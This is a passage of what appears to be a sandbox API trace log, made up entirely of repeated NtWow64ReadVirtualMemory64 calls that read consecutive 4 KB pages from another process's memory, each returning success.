(in: ProcessHandle=0x1e4, BaseAddress=0x77f5b000, Buffer=0x7ff9, BufferSize=0x274b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5c000, Buffer=0x7ff9, BufferSize=0x274c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5d000, Buffer=0x7ff9, BufferSize=0x274d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5e000, Buffer=0x7ff9, BufferSize=0x274e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5f000, Buffer=0x7ff9, BufferSize=0x274f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f60000, Buffer=0x7ff9, BufferSize=0x2750000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f61000, Buffer=0x7ff9, BufferSize=0x2751000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f62000, Buffer=0x7ff9, BufferSize=0x2752000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f63000, Buffer=0x7ff9, BufferSize=0x2753000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f64000, Buffer=0x7ff9, BufferSize=0x2754000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f65000, Buffer=0x7ff9, BufferSize=0x2755000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f66000, Buffer=0x7ff9, BufferSize=0x2756000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f67000, Buffer=0x7ff9, BufferSize=0x2757000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f68000, Buffer=0x7ff9, BufferSize=0x2758000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f69000, Buffer=0x7ff9, BufferSize=0x2759000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6a000, Buffer=0x7ff9, BufferSize=0x275a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6b000, Buffer=0x7ff9, BufferSize=0x275b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6c000, Buffer=0x7ff9, BufferSize=0x275c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6d000, Buffer=0x7ff9, BufferSize=0x275d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6e000, Buffer=0x7ff9, BufferSize=0x275e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6f000, Buffer=0x7ff9, BufferSize=0x275f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f70000, Buffer=0x7ff9, BufferSize=0x2760000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f71000, Buffer=0x7ff9, BufferSize=0x2761000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f72000, Buffer=0x7ff9, BufferSize=0x2762000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f73000, Buffer=0x7ff9, BufferSize=0x2763000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f74000, Buffer=0x7ff9, BufferSize=0x2764000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f75000, Buffer=0x7ff9, BufferSize=0x2765000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f76000, Buffer=0x7ff9, BufferSize=0x2766000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f77000, Buffer=0x7ff9, BufferSize=0x2767000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f78000, Buffer=0x7ff9, BufferSize=0x2768000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f79000, Buffer=0x7ff9, BufferSize=0x2769000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7a000, Buffer=0x7ff9, BufferSize=0x276a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7b000, Buffer=0x7ff9, BufferSize=0x276b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7c000, Buffer=0x7ff9, BufferSize=0x276c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7d000, Buffer=0x7ff9, BufferSize=0x276d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7e000, Buffer=0x7ff9, BufferSize=0x276e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7f000, Buffer=0x7ff9, BufferSize=0x276f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f80000, Buffer=0x7ff9, BufferSize=0x2770000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f81000, Buffer=0x7ff9, BufferSize=0x2771000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f82000, Buffer=0x7ff9, BufferSize=0x2772000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f83000, Buffer=0x7ff9, BufferSize=0x2773000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f84000, Buffer=0x7ff9, BufferSize=0x2774000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f85000, Buffer=0x7ff9, BufferSize=0x2775000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f86000, Buffer=0x7ff9, BufferSize=0x2776000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f87000, Buffer=0x7ff9, BufferSize=0x2777000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f88000, Buffer=0x7ff9, BufferSize=0x2778000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f89000, Buffer=0x7ff9, BufferSize=0x2779000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8a000, Buffer=0x7ff9, BufferSize=0x277a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8b000, Buffer=0x7ff9, BufferSize=0x277b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8c000, Buffer=0x7ff9, BufferSize=0x277c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8d000, Buffer=0x7ff9, BufferSize=0x277d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8e000, Buffer=0x7ff9, BufferSize=0x277e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8f000, Buffer=0x7ff9, BufferSize=0x277f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f90000, Buffer=0x7ff9, BufferSize=0x2780000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f91000, Buffer=0x7ff9, BufferSize=0x2781000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f92000, Buffer=0x7ff9, BufferSize=0x2782000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f93000, Buffer=0x7ff9, BufferSize=0x2783000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f94000, Buffer=0x7ff9, BufferSize=0x2784000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f95000, Buffer=0x7ff9, BufferSize=0x2785000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f96000, Buffer=0x7ff9, BufferSize=0x2786000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f97000, Buffer=0x7ff9, BufferSize=0x2787000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f98000, Buffer=0x7ff9, BufferSize=0x2788000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f99000, Buffer=0x7ff9, BufferSize=0x2789000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9a000, Buffer=0x7ff9, BufferSize=0x278a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9b000, Buffer=0x7ff9, BufferSize=0x278b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9c000, Buffer=0x7ff9, BufferSize=0x278c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9d000, Buffer=0x7ff9, BufferSize=0x278d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9e000, Buffer=0x7ff9, BufferSize=0x278e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9f000, Buffer=0x7ff9, BufferSize=0x278f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa0000, Buffer=0x7ff9, BufferSize=0x2790000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa1000, Buffer=0x7ff9, BufferSize=0x2791000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa2000, Buffer=0x7ff9, BufferSize=0x2792000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa3000, Buffer=0x7ff9, BufferSize=0x2793000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa4000, Buffer=0x7ff9, BufferSize=0x2794000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa5000, Buffer=0x7ff9, BufferSize=0x2795000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa6000, Buffer=0x7ff9, BufferSize=0x2796000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa7000, Buffer=0x7ff9, BufferSize=0x2797000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa8000, Buffer=0x7ff9, BufferSize=0x2798000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa9000, Buffer=0x7ff9, BufferSize=0x2799000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77faa000, Buffer=0x7ff9, BufferSize=0x279a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fab000, Buffer=0x7ff9, BufferSize=0x279b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fac000, Buffer=0x7ff9, BufferSize=0x279c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fad000, Buffer=0x7ff9, BufferSize=0x279d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fae000, Buffer=0x7ff9, BufferSize=0x279e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77faf000, Buffer=0x7ff9, BufferSize=0x279f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb0000, Buffer=0x7ff9, BufferSize=0x27a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb1000, Buffer=0x7ff9, BufferSize=0x27a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb2000, Buffer=0x7ff9, BufferSize=0x27a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb3000, Buffer=0x7ff9, BufferSize=0x27a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb4000, Buffer=0x7ff9, BufferSize=0x27a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb5000, Buffer=0x7ff9, BufferSize=0x27a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb6000, Buffer=0x7ff9, BufferSize=0x27a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb7000, Buffer=0x7ff9, BufferSize=0x27a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb8000, Buffer=0x7ff9, BufferSize=0x27a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb9000, Buffer=0x7ff9, BufferSize=0x27a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fba000, Buffer=0x7ff9, BufferSize=0x27aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbb000, Buffer=0x7ff9, BufferSize=0x27ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbc000, Buffer=0x7ff9, BufferSize=0x27ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbd000, Buffer=0x7ff9, BufferSize=0x27ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbe000, Buffer=0x7ff9, BufferSize=0x27ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbf000, Buffer=0x7ff9, BufferSize=0x27af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc0000, Buffer=0x7ff9, BufferSize=0x27b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc1000, Buffer=0x7ff9, BufferSize=0x27b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc2000, Buffer=0x7ff9, BufferSize=0x27b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc3000, Buffer=0x7ff9, BufferSize=0x27b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc4000, Buffer=0x7ff9, BufferSize=0x27b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc5000, Buffer=0x7ff9, BufferSize=0x27b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc6000, Buffer=0x7ff9, BufferSize=0x27b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc7000, Buffer=0x7ff9, BufferSize=0x27b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc8000, Buffer=0x7ff9, BufferSize=0x27b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc9000, Buffer=0x7ff9, BufferSize=0x27b9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fca000, Buffer=0x7ff9, BufferSize=0x27ba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcb000, Buffer=0x7ff9, BufferSize=0x27bb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] 